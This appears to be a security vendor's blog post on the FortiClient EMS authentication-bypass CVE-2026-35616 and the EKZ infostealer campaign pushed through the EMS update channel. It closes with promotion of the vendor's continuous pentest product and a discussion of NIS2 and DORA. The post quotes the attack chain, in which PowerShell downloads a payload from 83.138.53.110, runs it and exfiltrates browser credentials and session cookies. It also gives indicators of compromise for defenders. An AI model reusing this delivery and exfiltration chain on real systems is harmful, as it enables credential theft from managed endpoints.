FortiClient EMS CVE-2026-35616: when the security vendor's management plane ships the malware
The EKZ infostealer arrived on managed endpoints disguised as a Fortinet patch — pushed through the FortiClient EMS API after an unauthenticated bypass. Two months between disclosure and active campaign, and Fortinet still hasn't published IOCs.
On 27 May 2026 Arctic Wolf published the technical reconstruction of a campaign that had been running in customer networks for weeks: unauthenticated attackers abused CVE-2026-35616 on internet-exposed FortiClient EMS instances, modified VPN policies and endpoint update workflows on the management plane, and used that legitimate distribution channel to push an executable called FortiEndpoint_Patch.exe to every managed device. The executable was the EKZ infostealer. Every Chrome, Edge and Firefox credential — plus session cookies that the operator's MFA was supposed to protect — left the network over plain HTTP to a single VPS at 83.138.53.110.
The interesting part is not the infostealer. It is that the endpoints did exactly what they were configured to do — accept and execute an update from their security vendor's management server. The trust relationship that makes EMS useful is the same trust relationship that made the attack invisible. This is the supply-chain pattern auditors keep writing about in the abstract, instantiated in a real network with a real CVE.
What CVE-2026-35616 actually is
CVE-2026-35616 is an improper access control flaw in the FortiClient EMS API. The NVD record classifies it as CWE-284 with a CVSS 3.1 base of 9.8 (Fortinet's own advisory FG-IR-26-099 scored it 9.1; the difference is in scope assumptions, not in severity). An unauthenticated attacker sends crafted HTTP requests that bypass authentication on privileged endpoints. Affected: FortiClient EMS 7.4.5 and 7.4.6. Patched in 7.4.7. EMS 7.2 and earlier branches are not affected.
watchTowr's Attacker Eye sensors caught exploitation in the wild on 31 March 2026 — four days before Fortinet's advisory landed. Fortinet published the PSIRT bulletin on 4 April 2026 and CISA added the CVE to the Known Exploited Vulnerabilities catalogue two days later, on 6 April 2026, with a federal due date of 9 April 2026.
Federal civilian agencies had 72 hours. Everyone else had whatever cadence their change-management board allowed.
The two-month gap nobody talks about
Here is the timeline as a single table, because it is the whole story:
| Date | Event |
|---|---|
| 31 Mar 2026 | watchTowr observes active exploitation in the wild |
| 03 Apr 2026 | NVD publishes CVE-2026-35616 |
| 04 Apr 2026 | Fortinet PSIRT advisory FG-IR-26-099 |
| 06 Apr 2026 | CISA KEV addition (FCEB deadline 9 Apr) |
| early May 2026 | Arctic Wolf begins observing EKZ deployment via EMS |
| 27 May 2026 | Arctic Wolf publishes the full campaign analysis |
| 28 May 2026 | BleepingComputer coverage |
Two months from CISA's mandatory patch order to the first publicly documented infostealer campaign that abused the same flaw. The window was not idle. By the time Arctic Wolf wrote up the EKZ activity, the same Tor exit nodes (185.220.101.15, 192.42.116.14) had been knocking on FortiClient EMS APIs across multiple customer environments. Anyone still on 7.4.5 or 7.4.6 in mid-May had been exposed since early April. That is the gap continuous validation exists to close, and it is the gap that quarterly pentests structurally cannot.
How the EKZ campaign actually plays out
The novel part is not the post-exploitation code — EKZ is a competent but unremarkable Chromium and Gecko credential stealer. The novelty is the delivery path. The attacker never touches the endpoint directly. They authenticate to the EMS (well, bypass authentication on the EMS), modify a VPN policy, push a configuration that drops a script into C:\Program Files\Fortinet\FortiClient\logs\Trace\scripts\{GUID}.cmd, and let the FortiClient endpoint software do the rest.
Arctic Wolf's execution chain reads like a defender's worst case:
fortitray.exe(oripsec.exe) launchescmd.exe, which callspowershell.exewith a base64-encoded payload that downloadshxxp://83.138.53.110/dl/p.exetoC:\ProgramData\aslog.txt, renames it toFortiEndpoint_Patch.exe, executes it, and exfiltrates harvested data tohxxp://83.138.53.110/service/save.phpover plain HTTP.
Read that again with a SIEM analyst's eye. Every step is a legitimate FortiClient operation. The parent process is signed. The PowerShell call is base64-encoded but PowerShell is constantly invoked by EDR agents and management tools — alerting on every base64 invocation drowns the SOC. The download is over HTTP, which is suspicious but not unheard of for "update mirrors". The destination filename is FortiEndpoint_Patch.exe — the security vendor's own product. The exfil endpoint is /service/save.php on a single IP, but the volume per host is small (cookies, autofill, cached passwords compressed).
The credential stealer itself uses IElevator::DecryptData for Chromium master-key extraction and dynamically loads NSS libraries to read Firefox profiles. It targets autofill (credit cards, addresses, phone numbers) and session cookies — which is the MFA bypass everyone is now learning to worry about. Once you have a valid okta.session cookie, the second factor was already presented; you do not need to present it again.
Fortinet's PSIRT advisory does not publish IOCs. The detection signal Arctic Wolf surfaces is a log line — Certificate not found in request header followed by a successful certificate update from fortinet-ca2. If you are not watching EMS logs for that specific anomaly, the management plane looks fine.
Why the existing defence stack misses it
Three reasons, all structural:
- The patching window assumes there is a window. Quarterly pentest engagements and annual TLPT cycles cannot observe a fix that needs to be applied in 72 hours. Even monthly external scans miss a two-week active exploitation window. The defensive cadence has to match the offensive cadence, and offensive cadence is now measured in days from CISA add to in-the-wild use of the same vendor's product as a malware channel.
- Signature-based detection cannot catch a signed parent process running its native update flow.
fortitray.exeis on every endpoint allowlist that includes Fortinet. The only anomaly visible without behavioural analysis is the unexpected outbound HTTP to83.138.53.110— and many environments still permit endpoint software to fetch updates over HTTP because that is what some vendors actually do. - Vendor advisories without IOCs put the burden back on the customer. Fortinet's choice not to publish IOCs is defensible (they did not want to tip off attackers about telemetry blind spots), but it means the SOC has to invent its own detection content from third-party reports. Arctic Wolf's writeup is the IOC source of record for this campaign. CrowdStrike, Microsoft and Cisco have all done the same in recent quarters. The IOC-less advisory is not an exception any more.
What NIS2 and DORA actually require here
Both frameworks have moved past the "trust the vendor" assumption.
NIS2 Article 21(2)(d) lists supply chain security among the mandatory risk-management measures, and Annex I of the Italian transposition (D.Lgs. 138/2024) requires essential and important entities to test the security of products and services received from ICT suppliers, not just the security of what they build themselves. A patch lag of two months on a CVSS 9.8 vulnerability in a tool that has write access to every managed endpoint is exactly what the Italian ACN auditor will ask about in the first inspection cycle — the first NIS2 audit deadline lands on 30 June 2026.
DORA Article 28 and the TLPT Regulatory Technical Standards published in early 2025 extend the same logic to financial entities. ICT third-party risk has to be evidenced, not assumed. The auditor wants to see when the FortiClient EMS instance was last patched, when it was last tested, what the detection coverage of the EMS API was at the time, and what the response time would have been if an unauthenticated configuration change appeared in the logs. "We trust Fortinet's defaults" is not an answer the regulator accepts.
ENISA's threat landscape work over the last two cycles has been almost monotonous on this point: the 2024 and 2025 reports both highlight supply chain and managed-service-provider compromise as a top trend, and the percentage of incidents that begin with a known-CVE on an internet-exposed vendor product keeps climbing. CVE-2026-35616 is going to feed the next edition.
What changes if validation is continuous
The defensive answer to the FortiClient EMS pattern is not "patch faster" — every CISO already wanted to patch faster. The answer is to make exposure visible the day it appears, and to make the evidence of that visibility auditable when the regulator asks.
Zero Hunt's 10-agent generative pentest engine targets exactly this gap. The Recon agent enumerates the external perimeter on every scheduled and change-triggered campaign, identifies new appliances and management planes (FortiClient EMS exposes a distinct fingerprint that the engine flags by default), and the Exploit and Credential agents validate the exploitable state of the host against the 21 threat intelligence sources synced continuously — including CISA KEV, NVD and ExploitDB. When CVE-2026-35616 hit KEV on 6 April, every Zero Hunt customer with an EMS in scope would have seen a fresh finding on the next campaign cycle, with the exploit chain proven in an ephemeral container rather than inferred from a version banner. The two-month window between CISA add and Arctic Wolf publishing is the window where unvalidated patch lag becomes a documented infostealer campaign — and it is the window where continuous validation has measurable defensive value.
The compliance side closes the loop. Each finding, scan and remediation is mapped automatically against the 32 frameworks the engine tracks — NIS2 Title 13, DORA Article 28, ISO 27001 A.5.21 (supplier relationships), NIST CSF SC.RM-04 — and signed with ECDSA at write time so the audit bundle the ACN inspector or the EBA TLPT lead actually asks for is generated continuously rather than reconstructed quarterly. Cross-framework mapping means the same FortiClient EMS finding becomes evidence in NIS2, DORA, ISO and SOC 2 audits simultaneously, instead of three separate teams writing three separate narratives about the same patch lag.
The wire side is the third leg, and it is the one that catches the campaigns that slip through the first two. Zero Hunt's AI Traffic Analysis runs on the appliance GPU at 2.7+ Gbit/s, with four parallel inference heads (suspicious traffic, malware classification, attack type, application fingerprinting). The PowerShell-launched HTTP transfer to 83.138.53.110 from a host that historically only talks to Fortinet update CDNs is the exact behavioural signature the traffic head was trained to flag — during the exfiltration, not in next morning's SIEM digest, and without any dependency on Fortinet publishing the IOC list.
The vendor management plane is part of the attack surface. Treat it that way before the auditor does.